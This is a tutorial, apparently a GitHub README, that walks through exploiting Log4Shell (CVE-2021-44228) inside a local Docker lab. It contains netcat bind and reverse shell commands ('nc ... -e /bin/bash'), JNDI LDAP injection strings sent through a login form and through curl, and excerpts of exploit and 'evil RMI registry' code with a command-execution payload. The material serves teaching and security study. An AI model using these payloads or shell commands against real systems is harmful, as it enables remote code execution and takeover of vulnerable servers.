# A Tutorial for understanding CVE-2021-44228 and its affect on Apache Log4j

## Netcat reverse shell refresher inside docker
* [https://www.infosecademy.com/netcat-reverse-shells/](https://www.infosecademy.com/netcat-reverse-shells/)
* [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/)

We want the following to establish a Bash shell on a victim docker container:

* Run gnu netcat on the Victim `nc 172.17.0.3 1234 -e /bin/bash`
* Run gnu netcat on the Attacking container `nc -lvp 1234`

Optionally you can first create a `Dockerfile` within the directory you with to run the `docker` command which will update the debian container and install `netcat` before running. Otherwise you can simply run the `pacman -Sy gnu-netcat iproute2` manually once your containers are up and running. Here is the Dockerfile:

### Animated walkthrough of the two terminals used as the `attacker` and `victim` containers.

<!-- termtosvg svg image -->
![attacker container build](images/termtosvg_5dvfi2d2.svg)
<!-- blank line -->


<!-- termtosvg svg image -->
![victim container build](images/termtosvg_llkvo6k7.svg)
<!-- blank line -->


## Dockerfile setup

Create a new directory of any name, within the directory create a new file called `Dockerfile` and edit as follows:

```bash 
FROM archlinux

RUN pacman --noconfirm -Sy gnu-netcat iproute2
```

Build an updated [Arch Linux](https://archlinux.org/) image with gnu-netcat and routing tools included. 

```bash
sudo docker build -t arch_gnu-netcat:v1 .
```
Verify this modified container was created.

```bash
[trentonknight@archMac custom]$ sudo docker images
REPOSITORY        TAG       IMAGE ID       CREATED         SIZE
arch_gnu-netcat   v1        23ea6521e3a5   2 minutes ago   484MB
archlinux         latest    2a4e5b8e6c26   5 days ago      387MB
```
Run two new expendable containers using repository name and version `arch_gnu-netcat:v1` or if prefered use the `IMAGE ID`. The example below uses the `REPOSITORY` and `TAG` or the original build name:

```bash
sudo docker run --rm -it --name attacker --hostname attacker arch_gnu-netcat:v1 bash
```

```bash
sudo docker run --rm -it --name victim --hostname victim arch_gnu-netcat:v1 bash
```

## Without Dockerfile

Alternativly, if you chose to not use the `Dockerfile` create two standard `archlinux` containers and run the `pacman -Sy netcat iproute2` afterwards.

```bash
sudo docker run --rm -it --name attacker --hostname attacker archlinux bash
```

```bash
sudo docker run --rm -it --name victim --hostname victim archlinux bash
```


## gnu-netcat bind shell on Arch Linux containers

### Victim container

The victim container we simply need to do two things, get our ip address with the standard linux [iproute2](https://wiki.linuxfoundation.org/networking/iproute2) utilities command `ip address` or `ip a`, [net-tools](https://lists.debian.org/debian-devel/2009/03/msg00780.html) which used the `ifconfig` command was deprecated on 15 March 2009, and fire up the gnu version of netcat with `nc -nvlp 5555 -e /bin/bash`. Leave it like that and move to the `attacker` container in the other terminal.

```bash
[root@victim /]# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
173: eth0@if174: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
       valid_lft forever preferred_lft forever
```

Starting `gnu-netcat` in victim container example.

```bash
[root@victim /]# nc -nvlp 5555 -e /bin/bash
```

### Attacker container

In the attacker container run `gnu-netcat` with the command `nc -nv <victim ip address here> 5555`

```bash
[root@attacker /]# nc -nv 172.17.0.2 5555
172.17.0.2 5555 (personal-agent) open
```
As soon as you run the above command you should see the `victim` container report the following:

```bash
[root@victim /]# nc -nvlp 5555 -e /bin/bash
Connection from 172.17.0.3:41970
```

You should now have a `Bind Shell` from the `attacker` container to the `victim` container. The listener is on the `victim` machine, and the attcker knows the `victim` ip address. Try a few bash commands in the `attacker` container to verify connection.

```bash
uname -a
Linux victim 5.15.12-arch1-1 #1 SMP PREEMPT Wed, 29 Dec 2021 12:04:56 +0000 x86_64 GNU/Linux
```


## gnu-netcat reverse shell on Arch Linux containers

### Animated walkthrough of the two terminals used as the `attacker` and `victim` containers with a reverse shell.

<!-- termtosvg svg image -->
![attacker container build](images/termtosvg_xr8795fq.svg)
<!-- blank line -->


<!-- termtosvg svg image -->
![victim container build](images/termtosvg_vcwce5ep.svg)
<!-- blank line -->

Before we start using the `log4j-poc` repository to demo that exploit let practice creating a `reverse shell` which is basically the same concept but in reverse. The listener is now on the `attacker` expecting a connection from the `victim` container via the `attacker` ip address.  This time we will start instead with the attackers container and start a listener:

```bash
[root@attacker /]# nc -nvlp 5555
```
Now that a listener is running we can wait until at some point a reverse shell is created. Because it is a reverse shell the victims container will need the `ip address` this time.

```bash
[root@victim /]# nc -nv 172.17.0.3 5555 -e /bin/bash
```
When the victim connects the victim container shows the following:

```bash
[root@victim /]# nc -nv 172.17.0.3 5555 -e /bin/bash
172.17.0.3 5555 (personal-agent) open
```
While the attacker now connected shows:

```bash
[root@attacker /]# nc -nvlp 5555
Connection from 172.17.0.2:51312
```

You should now have a `Reverse Shell` from the `attacker` container to the `victim` container. Try a few bash commands in the `attacker` container and notice it is a `Reverse shell`:

```bash
uname -a
Linux victim 5.15.12-arch1-1 #1 SMP PREEMPT Wed, 29 Dec 2021 12:04:56 +0000 x86_64 GNU/Linux
```

## Clean up un-needed containers
* [https://arjunphp.com/stop-remove-docker-images-containers-volumes/](https://arjunphp.com/stop-remove-docker-images-containers-volumes/)

Before we setup the log4j-poc `docker-compose` lets remove the `Arch Linux` containers we used for practice. They will not be needed anymore.

To stop all running containers use the following command, do not use this command is you currently have other docker containers not associated with this exercise that you wish to leave running:

```bash
sudo docker stop $(sudo docker ps -aq)
```

Then remove all Docker Images, and do not use this command if you currently have other Docker Images not associated with this exercise you wish to keep:

```bash
sudo docker rmi $(sudo docker images -q) -f
```
Running docker ps and image should now show no containers running nor images remaining.

```bash
sudo docker ps
sudo docker images
```

# Log4j-poc 
* [https://github.com/cyberxml/log4j-poc](https://github.com/cyberxml/log4j-poc)

First let's clone the `cyberxml` project `log4j-poc` which automates the setup of developer `kozmer` [log4j-shell-poc](https://github.com/kozmer/log4j-shell-poc).
 
```bash
git clone https://github.com/cyberxml/log4j-poc
```
### Animated walkthrough of the three terminals used in log4j-poc demo.

#### Terminal 1 hosting the log4j-poc_cve-web build

<!-- termtosvg svg image -->
![web svr container build](images/termtosvg_49a5kbxv.svg)
<!-- blank line -->

#### Terminal 2 used for running Curl authentication exploit

<!-- termtosvg svg image -->
![attacker terminal](images/termtosvg_w3lo33xf.svg)
<!-- blank line -->

#### Terminal 3 used for netcat listener 

<!-- termtosvg svg image -->
![attacker terminal 2](images/termtosvg_29vlvr3h.svg)
<!-- blank line -->

For your host computer which is running docker. Verify Docker network with `ip a | grep docker`:

```bash
[trentonknight@archMac log4j-poc]$ ip a | grep docker
5: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
```


Edit `LISTENER_ADDR=172.17.0.2` the `docker-compose.yml` within the `log4j-poc` you cloned and change it to your `docker0` bridge ip address. We will need this so our gnu-netcat listener can connect to the exploited `Apache Tomcat` webserver.  

```yaml
-poc:
    build: cve-poc
    hostname: ldapsvr
    domainname: ldapsvr.test
    environment:
      - POC_ADDR=172.16.238.11
      - POC_PORT=80
      - LISTENER_ADDR=172.17.0.1
      - LISTENER_PORT=9001`
```
Before we run `docker-compose` to build all of our docker containers we need to edit one of the servers `Dockerfile`. Look for the `Dockerfile` in the following PATH:`log4j-poc/cve-neo/Dockerfile`. You might see the following. [Unfortunetly](https://github.com/cyberxml/log4j-poc/issues/7) as of today the 25th of March 2022 this URL is a dead [link](https://dlcdn.apache.org/maven/maven-3/). However, the next release `apache-maven-3.8.5` is present and will work just fine for this lesson. Therefore, note the following within the `cve-neo` Dockerfile:

```yaml
RUN wget https://dlcdn.apache.org/maven/maven-3/3.8.4/binaries/apache-maven-3.8.4-bin.tar.gz &&\
    tar xvzf apache-maven-3.8.4-bin.tar.gz  &&\
    ln -s apache-maven-3.8.4 apache-maven
```
Simply edit the `Dockerfile` changing apache-maven to version `3.8.5` as follows:

```yaml
RUN wget https://dlcdn.apache.org/maven/maven-3/3.8.5/binaries/apache-maven-3.8.5-bin.tar.gz &&\
    tar xvzf apache-maven-3.8.5-bin.tar.gz  &&\
    ln -s apache-maven-3.8.5 apache-maven
```
Good now you won't have to see this when running `docker-compose`:

```bash
failed to solve: executor failed running [/bin/sh -c wget https://dlcdn.apache.org/maven/maven-3/3.8.4/binaries/apache-maven-3.8.4-bin.tar.gz &&    tar xvzf apache-maven-3.8.4-bin.tar.gz  &&    ln -s apache-maven-3.8.4 apache-maven]: exit code: 8
```
Okay lets run `docker-compose` now that you have appended the `Docker0` bridge IP to the `docker-compose.yml` file and updated the `apache-maven` version URL in the `cve-neo` Dockerfile. 

```bash
sudo docker-compose up
```
### Troubleshooting

If you see `log4j-poc-cve-web-1 exited with code 0` as shown below simply re-run `docker-compose`:

```bash
log4j-poc-cve-neo-1  | tomcat 18:17:49.16 INFO  ==> ** tomcat setup finished! **
log4j-poc-cve-neo-1  | tomcat 18:17:49.17 INFO  ==> ** Starting Tomcat **
log4j-poc-cve-neo-1  | NOTE: Picked up JDK_JAVA_OPTIONS:  --add-opens=java.base/java.lang=ALL-UNNAMED --add-opens=java.base/java.io=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED --add-opens=java.base/java.util.concurrent=ALL-UNNAMED --add-opens=java.rmi/sun.rmi.transport=ALL-UNNAMED
log4j-poc-cve-web-1  | Tomcat started.
log4j-poc-cve-poc-1  | Listening on 0.0.0.0:1389
log4j-poc-cve-poc-1 exited with code 0
log4j-poc-cve-web-1 exited with code 0
```

From your computer which is hosting Docker start up a listener as soon as `docker-compose up` completes and is running.

```bash
[trentonknight@archMac log4j-poc]$ nc -lv 172.17.0.1 9001
```


Verify the three Docker containers built from `docker-compose` `log4j-poc_cve-web`, `log4j-poc_cve-poc` and `log4j-poc_cve-neo` are running:

```bash
[trentonknight@archMac log4j-poc]$ sudo docker ps
CONTAINER ID   IMAGE                  COMMAND                  CREATED       STATUS          PORTS                                                           NAMES
165dbb9cb4e4   log4j-poc_cve-web      "/entrypoint.sh /ent…"   2 hours ago   Up 19 minutes   4200/tcp, 8000/tcp, 0.0.0.0:8080->8080/tcp, :::8080->8080/tcp   log4j-poc-cve-web-1
b264b7484a66   log4j-poc_cve-poc      "/entrypoint.sh /ent…"   2 hours ago   Up 19 minutes   22/tcp, 4200/tcp, 8000/tcp, 8080/tcp                            log4j-poc-cve-poc-1
f3616e571dd3   log4j-poc_cve-neo      "/opt/bitnami/script…"   2 hours ago   Up 19 minutes   8009/tcp, 0.0.0.0:8888->8080/tcp, :::8888->8080/tcp             log4j-poc-cve-neo-1
```

# Docker Network Inspection


## Viewing the application inside the Docker network

Analyzing the `log4j-poc_cve-net` network in Docker.

```bash
sudo docker network ls
```
Identify container `IPv4Address`

```bash
[trentonknight@archMac ~]$ sudo docker network inspect log4j-poc_cve-net
```

```json
    {
        "Name": "log4j-poc_cve-net",
        "Id": "3a79676227c816f4cb61ae593f941e96398c30664e77964f1e0b9e7399d42ab8",
        "Created": "2022-01-08T13:17:42.17153744-05:00",
        "Scope": "local",
        "Driver": "bridge",
        "EnableIPv6": false,
        "IPAM": {
            "Driver": "default",
            "Options": null,
            "Config": [
                {
                    "Subnet": "172.16.238.0/24"
                }
            ]
        },
        "Internal": false,
        "Attachable": false,
        "Ingress": false,
        "ConfigFrom": {
            "Network": ""
        },
        "ConfigOnly": false,
        "Containers": {
            "165dbb9cb4e45af87bac436b4747669f795f411854e85325ca2628bb31fe3026": {
                "Name": "log4j-poc-cve-web-1",
                "EndpointID": "6cc99428e836fe0da62460d0ef480ba7784d44e24a4a40ab0e2b86938eb316fd",
                "MacAddress": "02:42:ac:10:ee:0a",
                "IPv4Address": "172.16.238.10/24",
                "IPv6Address": ""
            },
            "b264b7484a664cb26e634b304ac17ce71fe27c179b3b017adbd805041a07d59b": {
                "Name": "log4j-poc-cve-poc-1",
                "EndpointID": "0fa60ef06ebebaf20c5c8f998ca73092a67551e67e2bbfc17be1c57149d9704b",
                "MacAddress": "02:42:ac:10:ee:0b",
                "IPv4Address": "172.16.238.11/24",
                "IPv6Address": ""
            },
            "f3616e571dd3538870209ba0b2e0e1d898643daa21fab5599611c2e12de1066c": {
                "Name": "log4j-poc-cve-neo-1",
                "EndpointID": "ae277e8dfa4b986ba2a10f2d27739ea7357042770eb9140a1ebcfec974912163",
                "MacAddress": "02:42:ac:10:ee:0c",
                "IPv4Address": "172.16.238.12/24",
                "IPv6Address": ""
            }
        },
        "Options": {
            "com.docker.network.enable_ipv6": "false"
        },
        "Labels": {
            "com.docker.compose.network": "cve-net",
            "com.docker.compose.project": "log4j-poc",
            "com.docker.compose.version": "2.2.3"
        }
    }
```

You are looking for the `IPv4Address` from container `log4j-poc-cve-web-1` which is running Apache Tomcat.

```json
"Containers": {
            "165dbb9cb4e45af87bac436b4747669f795f411854e85325ca2628bb31fe3026": {
                "Name": "log4j-poc-cve-web-1",
                "EndpointID": "6cc99428e836fe0da62460d0ef480ba7784d44e24a4a40ab0e2b86938eb316fd",
                "MacAddress": "02:42:ac:10:ee:0a",
                "IPv4Address": "172.16.238.10/24",
                "IPv6Address": ""
```

# Viewing the web application from `log4j-poc_cve-web` via the `Docker0` bridge.

Use your host browser or [Curl](https://curl.se/) to verify [Apache Tomcat](https://tomcat.apache.org/) is running.

```bash
curl 172.17.0.1:8080
```
Or use the internal `IPv4Address` you discovered from container `log4j-poc-cve-web-1`:

```bash
curl 172.16.238.10:8080
```
Using Firefox we can see the Tomcat server default main page.

<img src="images/tomcat1.png"/>

## Log4Shell

Access Log4Shell by adding the `/log4shell/` directory to your `Docker0` bridge ip address or the `IPv4Address` from container `log4j-poc-cve-web-1`. 

* [http://172.17.0.1:8080/log4shell/](http://172.17.0.1:8080/log4shell/)

<img src="images/login.png" />
<img src="images/login2.png" />

### How does this exploit work?

![Java Naming and Directory Interface (JNDI)](images/Oracle.png)

## JNDI Packaging

[JNDI](https://docs.oracle.com/javase/tutorial/jndi/overview/index.html) is included in the Java SE Platform. To use the JNDI, you must have the JNDI classes and one or more service providers. The JDK includes service providers for the following naming/directory services:

* Lightweight Directory Access Protocol (LDAP)
* Common Object Request Broker Architecture (CORBA) 
* Common Object Services (COS) name service
* Java Remote Method Invocation (RMI) Registry
* Domain Name Service (DNS)

### The JNDI is divided into five packages:

* javax.naming
* javax.naming.directory
* javax.naming.ldap
* javax.naming.event
* javax.naming.spi

This is the point in which we run the `log4j` exploit. You can login as the username `admin` the password `password` to view normal authentication. However, next we are going to exploit the Java Naming and Directory Interface (JNDI). The following description by [Author Akash Patil provides a clear understanding of the log4j exploitation process](https://akashpatil.me/log4j-guide-book.html?utm_source=pocket_mylist)

1. An attacker inserts the JNDI lookup/payload an anywhere of request that is likely to be logged. (for instance: ${jndi:ldap://domain.com/j})

2. The payload is passed to log4j for logging.

3. Log4j interpolates the string and queries the malicious LDAP server.

4. The LDAP server responds with directory information that contains the malicious java class.

5. Java deserializes or downloads the malicious java class and executes it.

### Using JNDI

Before we get too much in the weeds lets check out how it works. Enter the following into [http://172.17.0.1:8080/log4shell/](http://172.17.0.1:8080/log4shell/) into only the top textarea, leaving the password textarea blank.

```bash
${jndi:ldap://172.16.238.11:1389/a}
```

Select the `Login` button. As soon as this entry is submitted via the `Login` button you should see a reverse shell connection establish with the listening gnu-netcat command you made earlier `nc -lv 172.17.0.1 9001`:

```bash
Listening on archMac 9001
Connection received on 172.16.238.10 42462
```
Try a few linux commands as you did before in the `gnu-netcat` refresher.

```bash
uname -a
Linux websvr 5.15.12-arch1-1 #1 SMP PREEMPT Wed, 29 Dec 2021 12:04:56 +0000 x86_64 GNU/Linux
```
 
Run nmap on the `Docker0` bridge to see what services are running. Notice during the victim server running log4j 
 
```bash
[trentonknight@archMac log4j-poc]$ nmap -Pn 172.17.0.1
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-08 23:33 EST
Nmap scan report for 172.17.0.1
Host is up (0.00023s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE
8080/tcp open  http-proxy
8888/tcp open  sun-answerbook
9001/tcp open  tor-orport

Nmap done: 1 IP address (1 host up) scanned in 0.11 seconds
```
Finally, hit Ctrl+c within the terminal in which you ran `docker-compose up` to shut it down.

# User Agent attack example using Curl

Similar to the previous attack we will use the same `username` or specifically in this case the `uname` as found in the login page:

```html
<input class="pl-2 outline-none border-none" type="text" name="uname" placeholder="Username" />
```
Start up `gnu-netcat` the same as before.

```bash
nc -lv 172.17.0.1 9001
```
Start up the exploitable `log4j-poc` environment developed by author `cyberxml` once again using:

```bash
sudo docker-compose up
```

Run the following curl command allowing `uname` to equal `${jndi:ldap://172.16.238.11:1389/a}`:

```bash
curl -d 'uname=\${jndi:ldap://172.16.238.11:1389/a}' http://172.17.0.1:8080/log4shell/
```
Once again you should see a bind shell connection and be able to run commands on this victim server:

```bash
[trentonknight@archMac log4j-poc]$ nc -lv 172.17.0.1 9001
Listening on archMac 9001
Connection received on 172.16.238.10 42502
ls
log4j-shell-poc
maven3
tomcat8
```

# Breakdown of the log4j-poc network

As docker-compose comes online we can view documented details about features of 

```bash
Attaching to log4j-poc-cve-neo-1, log4j-poc-cve-poc-1, log4j-poc-cve-web-1
log4j-poc-cve-poc-1  | running ... python3 poc.py 172.16.238.11 80 172.17.0.1 9001
```

The following is the code from [poc.py](https://github.com/cyberxml/log4j-poc/tree/main/cve-neo/files/opt/bitnami/log4j-shell-poc) containing a [java](https://github.com/mbechler/marshalsec) based payload via the bad JNDI URL from an attacker Lightweight Directory Access Protocol (LDAP) server. Most of the source code has been ommited to make viewing easier:

```python
import subprocess
import os
import sys

    javapayload = ("""

import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;

public class Exploit {

    f = open("Exploit.java", "w")
    f.write(javapayload)
    f.close()

    os.system('/opt/jdk1.8.0_51/bin/javac Exploit.java')

    sendme = ("${jndi:ldap://%s:1389/a}") % (userip)
    print("[+] Send me: "+sendme+"\n")

def marshalsec():
    os.system("/opt/jdk1.8.0_51/bin/java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://{}:{}/#Exploit".format(userip, userport))
```

The JNDI URL directing the victim server to the bad ldap server. Now lets look at Remote Method Invocation (RMI).

```bash
log4j-poc-cve-poc-1  | running ... java -cp catalina.jar:. RMIServerPOC 172.17.0.1
```

The below is the java code for the [Evil RMI registry](https://github.com/cyberxml/log4j-poc/tree/main/cve-poc/files/home/user/rmi-poc):

```java
import java.rmi.registry.*;

import com.sun.jndi.rmi.registry.*;
import javax.naming.*;
import org.apache.naming.ResourceRef;
 

public class RMIServerPOC {
    public static void main(String[] args) throws Exception {

        System.out.println("Creating evil RMI registry on port 1097");

        Registry registry = LocateRegistry.createRegistry(1097);
        ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','/bin/ping -c 4 10.10.10.31']).start()\")"));

        ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);

        registry.bind("Object", referenceWrapper);

    }

}
```
Below you see `log4j-poc-cve-poc-1` listening followed by any connections you make via the JNDI/LDAP which kicks off the payload such as the `Exploit.class` shown below and seen previously in the modified version of poc.py originally from the [https://github.com/kozmer/log4j-shell-poc](https://github.com/kozmer/log4j-shell-poc) project on github, used in the [https://github.com/cyberxml/log4j-poc](https://github.com/cyberxml/log4j-poc) docker network we are using now:

```bash
log4j-poc-cve-poc-1  | Listening on 0.0.0.0:1389
log4j-poc-cve-poc-1  | Send LDAP reference result for a redirecting to http://172.16.238.11:80/Exploit.class
log4j-poc-cve-poc-1  | Send LDAP reference result for a redirecting to http://172.16.238.11:80/Exploit.class
log4j-poc-cve-poc-1  | Send LDAP reference result for a redirecting to http://172.16.238.11:80/Exploit.class
```

# What next? 
Additional tutorials using [log4j-poc](https://github.com/cyberxml/log4j-poc) are available on Github such as:

* Run a DNS Exfil Demo on Recent Java 11 version
* Run an RMI RCE Demo on Recent Java 11 version
* Detect UA Vulnerability

The original [log4j-shell-poc](https://github.com/kozmer/log4j-shell-poc) project does not offer a `one-click exploit to CVE-2021-44228` but provides the basics needed to begin understanding and potentially writing your own `log4j` proof of concept. POC's shown on the `log4j-shell-poc` page provides proof videos of:

* Vuln Web App
* Ghidra
* Minecraft



# Clean up
* [https://arjunphp.com/stop-remove-docker-images-containers-volumes/](https://arjunphp.com/stop-remove-docker-images-containers-volumes/)

Stop all running containers, do not use this is you currently have other docker containers not associated with this exercise:

```bash
sudo docker stop $(sudo docker ps -aq)
```

Remove all Docker Images, do not use this command if you currently have other Docker Images not associated with this exercise:

```bash
sudo docker rmi $(sudo docker images -q) -f
```
Running docker ps and image should now show no containers running nor images remaining.

```bash
sudo docker ps
sudo docker images
```
# REFERENCES

* [https://nvd.nist.gov/vuln/detail/CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228)
* [https://logging.apache.org/log4j/2.x/security.html](https://logging.apache.org/log4j/2.x/security.html)
* [https://logging.apache.org/log4j/2.x/download.html](https://logging.apache.org/log4j/2.x/download.html)
* [https://www.docker.com/blog/apache-log4j-2-cve-2021-44228/](https://www.docker.com/blog/apache-log4j-2-cve-2021-44228/)
* [https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/](https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/)
* [https://www.exploit-db.com/exploits/50592](https://www.exploit-db.com/exploits/50592)
* [https://snyk.io/blog/log4j-vulnerability-software-supply-chain-security-log4shell/](https://snyk.io/blog/log4j-vulnerability-software-supply-chain-security-log4shell/)
* [https://security.snyk.io/vuln/SNYK-JAVA-LOG4J-2316893](https://security.snyk.io/vuln/SNYK-JAVA-LOG4J-2316893)
* [https://raxis.com/blog/log4j-exploit](https://raxis.com/blog/log4j-exploit)
* [https://logging.apache.org/log4j/2.x/manual/lookups.html](https://logging.apache.org/log4j/2.x/manual/lookups.html)
* [exploiting-jndi-injections-java](https://www.veracode.com/blog/research/exploiting-jndi-injections-java)

# TOOLS

* [https://log4shell.tools/](https://log4shell.tools/)
* [https://github.com/kozmer/log4j-shell-poc?utm_source=pocket_mylist](https://github.com/kozmer/log4j-shell-poc?utm_source=pocket_mylist)
* [https://github.com/docker/scan-cli-plugin](https://github.com/docker/scan-cli-plugin)

# CHEAT SHEETS

* [https://docs.docker.com/engine/reference/commandline/docker/](https://docs.docker.com/engine/reference/commandline/docker/)
* [https://snyk.io/wp-content/uploads/cheat-sheet-log4shell-remediation-v6.pdf](https://snyk.io/wp-content/uploads/cheat-sheet-log4shell-remediation-v6.pdf)
